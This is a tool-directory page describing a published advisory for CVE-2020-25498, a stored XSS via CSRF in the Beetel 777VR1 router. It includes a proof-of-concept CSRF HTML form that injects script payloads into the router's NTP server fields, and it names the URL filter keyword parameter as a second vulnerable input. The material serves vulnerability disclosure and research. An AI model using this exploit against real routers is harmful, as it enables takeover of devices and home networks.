Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-25498 — Stored XSS via CSRF in Beetel 777VR1 Router | Kitploit
Tools/GitHubGitHub/the-girl-who-lived/cve-2020-25498
Phishing ToolsVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubthe-girl-who-lived/cve-2020-25498

CVE-2020-25498

Stored XSS via CSRF in Beetel 777VR1 Router

View Repository
335 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-25498: Stored XSS via CSRF in Beetel 777VR1 Router

Vulnerability Description

It has been identified that the vulnerable endpoint doesn't have server side input validation and lacks client side filtering for any malicious script injection. An attacker can use this vulnerability to inject malicious script in the endpoint and the script is activated every time a user opens the vulnerable endpoint. Attacker can send a malicious URL with POST request payload to execute XSS in admin module via CSRF to take over the device and finally, to take over the network.

Researcher: Sayli Ambure (https://twitter.com/sayli_ambure)

MITRE CVE link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498

Proof-of-Concept Exploit:

CSRF HTML Code:

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/form2ntp.cgi" method="POST">
      <input type="hidden" name="ntpstate" value="Enable" />
      <input type="hidden" name="ntpserver" value='google&#46;com"><script>alert(1)</script>' />
      <input type="hidden" name="ntpserver2" value='google&#46;com"><script>alert(2)</script>' />
      <input type="hidden" name="ntpinterval" value="1" />
      <input type="hidden" name="ntptimezone" value="330" />
      <input type="hidden" name="submit&#46;htm&#63;time&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1. NTP Server Name in System Time configuration module

Parameter: Server name

Proof of Concept Video:

2. URL Filter endpoint in Firewall module

Parameter: Keyword

Proof of Concept video:

Download Tool